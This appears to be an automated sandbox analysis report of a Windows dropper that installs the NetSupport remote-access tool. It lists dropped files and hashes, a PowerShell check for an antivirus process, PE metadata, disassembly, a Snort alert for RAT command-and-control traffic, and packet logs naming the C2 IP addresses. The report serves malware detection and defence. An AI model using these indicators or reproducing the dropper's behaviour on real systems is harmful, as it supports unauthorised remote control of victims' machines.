                                                                                                                        MD5:0DE7714C930DA43E7F687E31C34B0E89
                                                                                                                        SHA1:AC0C59FFD0BEE0DC5C715805303A01CBCB72B8FA
                                                                                                                        SHA-256:2A575A3C0360A79A2851474F687980547B856C409BF659022F46B58C009A8E59
                                                                                                                        SHA-512:1EDEE550767A931B1684793BF5A7C86D51C4CE99FFE5CD4EE99D4ECE8B7B6B940CCDEC2BF2B8BCA37DF95F9247343C1BD6C25BA1D33CFD3C35292E5E7C5A94F5
                                                                                                                        Malicious:false
                                                                                                                        Preview:PK........{X.I.p......x.......HTCTL32.DLL.:mp.U..3=I'.....J.X.{..i^= ..a...f.2.~L..5...b..>"....M...kQ..X.-.vk.Zk..q&.M.."VI.KPW..."D.dL.so.|%.pw.........}.9.....M...(..t...).......%..R....^.....>^...>.v....~.G..{.+]+=R..#.KV4.>....L)....]:........_}..@.........H.M}{H;..i..}?..2.|..?xo3....e..:.q.'...."......O.}_.i.(.2=q%O..F.3.R..A..o..*..a.dk4.O3........I.CU^...z.l...PT..P3..A?3nN.*`...L..I..W.n5..2.8....l...j.B..IuA.5...*3.w....o..O0...ek._{/E....Xh.N..*[{.C...=7.>..B...x.R....O#:..g=H...-.....7..xQ+o.U......T....Y(.........h.........O..)J.......].,n-n.g ...>k2...8.=....FV.4p.[..1k..K....)N.<FK..8..g|d......|....akX..H...8....Bt42.W....Ei........V{.r.=x....m..9.I.*...V9.r.i.u....l.)b.....n@>.1.+. J..K.iu9......n.K.......Y....E.3..|.....}B..JP......]..m.a`...m1 y.........y.2bU.R\.mc\H.6..\.:.z..F>.+z.."...N...y>...-...AN.[..+.Y._..|..#.2.U.cZ. .a.............h..K..../..f0=.#....v..OE....d.....zQ]1j.....v......M)F.". ...J...

                                                                                                                        C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\nskbfltr.inf

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\Desktop\0ud2VlMOvF.exe
                                                                                                                        File Type:Windows setup INFormation
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):328
                                                                                                                        Entropy (8bit):4.93007757242403
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6:a0S880EeLL6sWqYFcf8KYFEAy1JoHBIr2M2OIAXFYJKRLIkg/LH2yi9vyifjBLWh:JShNvPG1JoHBx2XFhILH4Burn
                                                                                                                        MD5:26E28C01461F7E65C402BDF09923D435
                                                                                                                        SHA1:1D9B5CFCC30436112A7E31D5E4624F52E845C573
                                                                                                                        SHA-256:D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
                                                                                                                        SHA-512:C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
                                                                                                                        Malicious:false
                                                                                                                        Preview:; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......

                                                                                                                        C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\nsm_vpro.ini

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\Desktop\0ud2VlMOvF.exe
                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):46
                                                                                                                        Entropy (8bit):4.532048032699691
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:lsylULyJGI6csM:+ocyJGIPsM
                                                                                                                        MD5:3BE27483FDCDBF9EBAE93234785235E3
                                                                                                                        SHA1:360B61FE19CDC1AFB2B34D8C25D8B88A4C843A82
                                                                                                                        SHA-256:4BFA4C00414660BA44BDDDE5216A7F28AECCAA9E2D42DF4BBFF66DB57C60522B
                                                                                                                        SHA-512:EDBE8CF1CBC5FED80FEDF963ADE44E08052B19C064E8BCA66FA0FE1B332141FBE175B8B727F8F56978D1584BAAF27D331947C0B3593AAFF5632756199DC470E5
                                                                                                                        Malicious:false
                                                                                                                        Preview:[COMMON]..Storage_Enabled=0..Debug_Level=0....

                                                                                                                        C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\pcicapi.dll

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\Desktop\0ud2VlMOvF.exe
                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):33144
                                                                                                                        Entropy (8bit):6.7376663312239256
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:JFvNhAyi5hHA448qZkSn+EgT8ToDXTVi0:JCyoHA448qSSzgIQb
                                                                                                                        MD5:34DFB87E4200D852D1FB45DC48F93CFC
                                                                                                                        SHA1:35B4E73FB7C8D4C3FEFB90B7E7DC19F3E653C641
                                                                                                                        SHA-256:2D6C6200508C0797E6542B195C999F3485C4EF76551AA3C65016587788BA1703
                                                                                                                        SHA-512:F5BB4E700322CBAA5069244812A9B6CE6899CE15B4FD6384A3E8BE421E409E4526B2F67FE210394CD47C4685861FAF760EFF9AF77209100B82B2E0655581C9B2
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\pcicapi.dll, Author: Joe Security
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+-..E~..E~..E~.\.~..E~.\.~..E~...~..E~..D~..E~.\.~..E~.\.~..E~.\.~..E~.\.~..E~...~..E~.\.~..E~Rich..E~........PE..L......U...........!.....2...........<.......P...............................`............@..........................^.......W..d....@..x............X..x)...P......`Q...............................V..@............P..@............................text....1.......2.................. ..`.rdata.......P.......6..............@..@.data...,....`.......F..............@....rsrc...x....@.......H..............@..@.reloc.......P.......P..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                        C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\remcmdstub.exe

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\Desktop\0ud2VlMOvF.exe
                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):63864
                                                                                                                        Entropy (8bit):6.446503462786185
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:Tf6fvDuNcAjJMBUHYBlXU1wT2JFqy9BQhiK:D6f7cjJ4U4I1jFqy92hiK
                                                                                                                        MD5:6FCA49B85AA38EE016E39E14B9F9D6D9
                                                                                                                        SHA1:B0D689C70E91D5600CCC2A4E533FF89BF4CA388B
                                                                                                                        SHA-256:FEDD609A16C717DB9BEA3072BED41E79B564C4BC97F959208BFA52FB3C9FA814
                                                                                                                        SHA-512:F9C90029FF3DEA84DF853DB63DACE97D1C835A8CF7B6A6227A5B6DB4ABE25E9912DFED6967A88A128D11AB584663E099BF80C50DD879242432312961C0CFE622
                                                                                                                        Malicious:true
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$U..`4..`4..`4..{.D.q4..{.p.54..iLI.e4..`4..74..{.q.}4..{.@.a4..{.G.a4..Rich`4..................PE..L......U.....................J.......!............@.......................... .......o....@....................................<.......T...............x)..............................................@...............@............................text............................... ..`.rdata...%.......&..................@..@.data....-..........................@....rsrc...T...........................@..@.reloc..p...........................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                        \Device\Null

                                                                                                                        Download File
                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):374
                                                                                                                        Entropy (8bit):4.8688725139463935
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6:WCJLcYSMA7zMAXGuw90qEe/PM5Wv9VCEGbA4pjU62szaBEE3BUNU6esC+ph+HIS:xmBOt97lHym1RBEE3Aes1phHS
                                                                                                                        MD5:165F1C4603538131BC472625D8FFC02A
                                                                                                                        SHA1:F9BE4191C4AA5C86E92F6249B31EFC5BE3618BC1
                                                                                                                        SHA-256:1273E8F2B29FA4E56F4D8965CEC6A86FDA6A3C1B9F03D8C8D196876A0631949B
                                                                                                                        SHA-512:2B752291563D23EC19F8AF136EAC251B42E8CCFF13DD6C05D22F097F0C424BD84CB4556860346E8D4699676F0015FCA2B6891F325A482F5AE4F095FA1EECCE3B
                                                                                                                        Malicious:false
                                                                                                                        Preview:get-process : Cannot find a process with the name "avgui". Verify the process name and call the cmdlet again..At line:1 char:1.+ get-process avgui.+ ~~~~~~~~~~~~~~~~~. + CategoryInfo : ObjectNotFound: (avgui:String) [Get-Process], ProcessCommandException. + FullyQualifiedErrorId : NoProcessFoundForGivenName,Microsoft.PowerShell.Commands.GetProcessCommand. .

                                                                                                                        Static File Info

                                                                                                                        General

                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Entropy (8bit):6.900590630778933
                                                                                                                        TrID:
                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                        File name:0ud2VlMOvF.exe
                                                                                                                        File size:417792
                                                                                                                        MD5:2db4e85f42ab1b1b22a6829f273566a7
                                                                                                                        SHA1:9883c2037aba20b5a962a121030360e989261bde
                                                                                                                        SHA256:1b23f6605bf3ee638b369bc344cbd02591b5a9ab320a874b07088652b8d93888
                                                                                                                        SHA512:762fadae6456a02aece3f7a49191d6f7dad3be95ff99562bb53cd2e0d529978911e8765af9652ec8d1d7f3562d5f5ca4dc8a331eae1ccbe81d2f8e203d0cd132
                                                                                                                        SSDEEP:6144:AZqs7XDQk8PFrWKN5nwtm/NYGridElYaa/7d8BrNtDAqlPJedOJKn4eirAj:AZqs7XWiKNBwaNtCZNKJdJZsj
                                                                                                                        TLSH:9F94D011BBE2C072E907097A092B476E9736FD4A1F2587C7EF941E1ECE702D29E36251
                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m.6...e...e...e...e...e...eV..e...e...e...e...e...eR..e...e...e...e...e...e...e...e...e...e...eRich...e................PE..L..

                                                                                                                        File Icon

                                                                                                                        Icon Hash:f0ecb2b8a0b2cc70

                                                                                                                        Static PE Info

                                                                                                                        General

                                                                                                                        Entrypoint:0x41c7ca
                                                                                                                        Entrypoint Section:.text
                                                                                                                        Digitally signed:true
                                                                                                                        Imagebase:0x400000
                                                                                                                        Subsystem:windows gui
                                                                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                        DLL Characteristics:NX_COMPAT
                                                                                                                        Time Stamp:0x4C208D7B [Tue Jun 22 10:16:27 2010 UTC]
                                                                                                                        TLS Callbacks:
                                                                                                                        CLR (.Net) Version:
                                                                                                                        OS Version Major:4
                                                                                                                        OS Version Minor:0
                                                                                                                        File Version Major:4
                                                                                                                        File Version Minor:0
                                                                                                                        Subsystem Version Major:4
                                                                                                                        Subsystem Version Minor:0
                                                                                                                        Import Hash:2053909a946a770e91562fee33517d62

                                                                                                                        Authenticode Signature

                                                                                                                        Signature Valid:
                                                                                                                        Signature Issuer:
                                                                                                                        Signature Validation Error:
                                                                                                                        Error Number:
                                                                                                                        Not Before, Not After
                                                                                                                          Subject Chain
                                                                                                                            Version:
                                                                                                                            Thumbprint MD5:
                                                                                                                            Thumbprint SHA-1:
                                                                                                                            Thumbprint SHA-256:
                                                                                                                            Serial:

                                                                                                                            Entrypoint Preview

                                                                                                                            Instruction
                                                                                                                            call 00007F84C8374F01h
                                                                                                                            jmp 00007F84C836BD3Bh
                                                                                                                            int3
                                                                                                                            int3
                                                                                                                            int3
                                                                                                                            int3
                                                                                                                            int3
                                                                                                                            int3
                                                                                                                            int3
                                                                                                                            int3
                                                                                                                            int3
                                                                                                                            int3
                                                                                                                            int3
                                                                                                                            int3
                                                                                                                            sub esp, 14h
                                                                                                                            push ebx
                                                                                                                            mov ebx, dword ptr [esp+20h]
                                                                                                                            push ebp
                                                                                                                            push esi
                                                                                                                            mov esi, dword ptr [ebx+08h]
                                                                                                                            xor esi, dword ptr [0043A6A8h]
                                                                                                                            push edi
                                                                                                                            mov eax, dword ptr [esi]
                                                                                                                            cmp eax, FFFFFFFEh
                                                                                                                            mov byte ptr [esp+13h], 00000000h
                                                                                                                            mov dword ptr [esp+18h], 00000001h
                                                                                                                            lea edi, dword ptr [ebx+10h]
                                                                                                                            je 00007F84C836BF2Fh
                                                                                                                            mov ecx, dword ptr [esi+04h]
                                                                                                                            add ecx, edi
                                                                                                                            xor ecx, dword ptr [eax+edi]
                                                                                                                            call 00007F84C836AB06h
                                                                                                                            mov ecx, dword ptr [esi+0Ch]
                                                                                                                            mov eax, dword ptr [esi+08h]
                                                                                                                            add ecx, edi
                                                                                                                            xor ecx, dword ptr [eax+edi]
                                                                                                                            call 00007F84C836AAF6h
                                                                                                                            mov eax, dword ptr [esp+28h]
                                                                                                                            test byte ptr [eax+04h], 00000066h
                                                                                                                            jne 00007F84C836C045h
                                                                                                                            mov ebp, dword ptr [ebx+0Ch]
                                                                                                                            cmp ebp, FFFFFFFEh
                                                                                                                            mov ecx, dword ptr [esp+30h]
                                                                                                                            lea edx, dword ptr [esp+1Ch]
                                                                                                                            mov dword ptr [esp+1Ch], eax
                                                                                                                            mov dword ptr [esp+20h], ecx
                                                                                                                            mov dword ptr [ebx-04h], edx
                                                                                                                            je 00007F84C836BF80h
                                                                                                                            lea eax, dword ptr [ebp+ebp*2+00h]
                                                                                                                            mov ecx, dword ptr [esi+eax*4+14h]
                                                                                                                            test ecx, ecx
                                                                                                                            lea ebx, dword ptr [esi+eax*4+10h]
                                                                                                                            mov eax, dword ptr [ebx]
                                                                                                                            mov dword ptr [esp+14h], eax
                                                                                                                            je 00007F84C836BF38h
                                                                                                                            mov edx, edi
                                                                                                                            call 00007F84C8372011h
                                                                                                                            test eax, eax
                                                                                                                            mov byte ptr [esp+13h], 00000001h
                                                                                                                            jl 00007F84C836BF66h
                                                                                                                            jnle 00007F84C836BF6Eh
                                                                                                                            mov eax, dword ptr [esp+14h]
                                                                                                                            cmp eax, FFFFFFFEh
                                                                                                                            mov ebp, eax
                                                                                                                            jne 00007F84C836BEEFh
                                                                                                                            cmp byte ptr [esp+13h], 00000000h
                                                                                                                            je 00007F84C836BF46h
                                                                                                                            mov eax, dword ptr [esi]
                                                                                                                            cmp eax, FFFFFFFEh
                                                                                                                            je 00007F84C836BF2Fh

                                                                                                                            Rich Headers

                                                                                                                            Programming Language:
                                                                                                                            • [ASM] VS2005 build 50727
                                                                                                                            • [ C ] VS2005 build 50727
                                                                                                                            • [IMP] VS2005 build 50727
                                                                                                                            • [C++] VS2005 build 50727
                                                                                                                            • [RES] VS2005 build 50727
                                                                                                                            • [LNK] VS2005 build 50727

                                                                                                                            Data Directories

                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x392840xf0.rdata
                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x3f0000x285d4DATA
                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x420000x1550DATA
                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x322800x1c.rdata
                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x361280x40.rdata
                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x320000x21c.rdata
                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                            Sections

                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                            .text0x10000x306580x31000False0.5288484534438775data6.599877783882421IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                            .rdata0x320000x7e060x8000False0.329833984375data4.6799439314056395IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                            .data0x3a0000x3de80x2000False0.2823486328125SysEx File - Synthaxe3.5278801339201613IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                            .hnvshr0x3e0000x40x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                            DATA0x3f0000x285d40x29000False0.8517709127286586data7.307100544843289IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

                                                                                                                            Resources

                                                                                                                            NameRVASizeTypeLanguageCountry
                                                                                                                            RT_ICON0x3f1300x4024Device independent bitmap graphic, 63 x 126 x 32, image size 0, resolution 2835 x 2835 px/mEnglishAustralia
                                                                                                                            RT_RCDATA0x431540x24186data
                                                                                                                            RT_GROUP_ICON0x672dc0x14dataEnglishAustralia
                                                                                                                            RT_VERSION0x672f00x2e4dataEnglishAustralia

                                                                                                                            Imports

                                                                                                                            DLLImport
                                                                                                                            KERNEL32.dllInterlockedIncrement, SetEndOfFile, SetFilePointer, GetFileSize, SetLastError, WriteFile, GetLastError, GetCurrentProcessId, GetCurrentThreadId, GetTickCount, GetLocalTime, CompareStringA, GetModuleHandleA, GetModuleFileNameA, GetWindowsDirectoryA, GetSystemDirectoryA, LoadLibraryA, InterlockedExchange, CreateThread, ResumeThread, GetExitCodeThread, CreateFileA, ReadFile, FlushFileBuffers, GetConsoleOutputCP, WriteConsoleA, SetStdHandle, GetConsoleMode, GetConsoleCP, IsValidLocale, EnumSystemLocalesA, GetUserDefaultLCID, GetLocaleInfoA, GetSystemTimeAsFileTime, SetThreadPriority, QueryPerformanceCounter, GetFileType, CloseHandle, WaitForSingleObject, ReleaseMutex, InterlockedDecrement, FreeLibrary, SetHandleCount, GetEnvironmentStrings, FreeEnvironmentStringsA, HeapReAlloc, VirtualAlloc, VirtualFree, HeapCreate, HeapDestroy, GetStdHandle, ExitProcess, HeapSize, GetOEMCP, GetACP, TlsFree, TlsSetValue, TlsAlloc, TlsGetValue, GetStringTypeA, LCMapStringA, GetStartupInfoA, HeapAlloc, GetVersionExA, GetCommandLineA, RtlUnwind, RaiseException, IsDebuggerPresent, SetUnhandledExceptionFilter, GetCurrentProcess, HeapFree, GetProcessHeap, lstrlenA, InterlockedCompareExchange, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, TerminateProcess, UnhandledExceptionFilter
                                                                                                                            ADVAPI32.dllRegCloseKey
                                                                                                                            USER32.dllGetDlgCtrlID, IsWindowEnabled, EndDialog, ScreenToClient, SetTimer, GetParent, GetMessagePos, GetWindowRect, ShowWindow, UpdateWindow, KillTimer, SetFocus, SetForegroundWindow, SetCursor, GetDesktopWindow, GetDlgItem
                                                                                                                            GDI32.dllDeleteObject
                                                                                                                            SHELL32.dllSHGetFolderPathW
                                                                                                                            COMCTL32.dllImageList_Destroy, ImageList_Add, ImageList_Create, InitCommonControlsEx
                                                                                                                            NETAPI32.dllNetApiBufferFree, NetServerEnum
                                                                                                                            WS2_32.dllWSAStartup, WSACleanup, gethostname
                                                                                                                            ole32.dllCoSetProxyBlanket, CoUninitialize, CoInitializeEx, CoCreateInstance, CoInitializeSecurity
                                                                                                                            OLEAUT32.dllVariantInit, SysStringByteLen, SysAllocStringByteLen, VariantClear, SysFreeString, SysStringLen, SysAllocString

                                                                                                                            Possible Origin

                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                            EnglishAustralia

                                                                                                                            Network Behavior

                                                                                                                            Snort IDS Alerts

                                                                                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                            192.168.2.4109.107.178.1064969725522827745 03/21/23-08:03:11.906603TCP2827745ETPRO TROJAN NetSupport RAT CnC Activity496972552192.168.2.4109.107.178.106

                                                                                                                            Network Port Distribution

                                                                                                                            TCP Packets

                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                            Mar 21, 2023 08:00:04.104563951 CET49695443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:04.104641914 CET44349695198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:04.104747057 CET49695443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:04.127397060 CET49695443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:04.127443075 CET44349695198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:04.521238089 CET44349695198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:04.521353960 CET49695443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:04.759773016 CET49695443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:04.759856939 CET44349695198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:04.760996103 CET44349695198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:04.761090994 CET49695443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:04.763403893 CET49695443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:04.763422012 CET44349695198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:04.947252989 CET44349695198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:04.947339058 CET49695443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:05.130424023 CET44349695198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:05.130491018 CET44349695198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:05.130570889 CET44349695198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:05.130592108 CET49695443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:05.130644083 CET44349695198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:05.130675077 CET49695443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:05.130718946 CET49695443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:05.173636913 CET44349695198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:05.173692942 CET44349695198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:05.173831940 CET49695443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:05.173876047 CET44349695198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:05.173907042 CET49695443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:05.173952103 CET49695443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:05.313971996 CET44349695198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:05.314091921 CET44349695198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:05.314310074 CET49695443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:05.314358950 CET44349695198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:05.314451933 CET49695443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:05.356811047 CET44349695198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:05.356869936 CET44349695198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:05.356996059 CET49695443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:05.357026100 CET44349695198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:05.357058048 CET49695443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:05.357084036 CET49695443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:05.497389078 CET44349695198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:05.497452974 CET44349695198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:05.497605085 CET49695443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:05.497644901 CET44349695198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:05.497673988 CET49695443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:05.497711897 CET49695443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:05.497780085 CET44349695198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:05.497831106 CET44349695198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:05.497876883 CET49695443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:05.497891903 CET44349695198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:05.497936964 CET49695443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:05.497956038 CET49695443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:05.498277903 CET44349695198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:05.498330116 CET44349695198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:05.498379946 CET49695443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:05.498394012 CET44349695198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:05.498419046 CET49695443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:05.498457909 CET49695443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:05.539979935 CET44349695198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:05.540045977 CET44349695198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:05.540205002 CET49695443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:05.540249109 CET44349695198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:05.540276051 CET49695443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:05.540334940 CET49695443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:05.681854963 CET44349695198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:05.681904078 CET44349695198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:05.682014942 CET49695443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:05.682058096 CET44349695198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:05.682090998 CET49695443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:05.682111979 CET49695443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:05.682670116 CET44349695198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:05.682738066 CET44349695198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:05.682794094 CET49695443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:05.682811975 CET44349695198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:05.682847977 CET49695443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:05.682869911 CET49695443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:05.683233023 CET44349695198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:05.683326006 CET44349695198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:05.683373928 CET49695443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:05.683391094 CET44349695198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:05.683420897 CET49695443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:05.683451891 CET49695443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:05.683964968 CET44349695198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:05.684010029 CET44349695198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:05.684056997 CET49695443192.168.2.4198.54.121.245
                                                                                                                            Mar 21, 2023 08:00:05.684071064 CET44349695198.54.121.245192.168.2.4
                                                                                                                            Mar 21, 2023 08:00:05.684097052 CET49695443192.168.2.4198.54.121.245
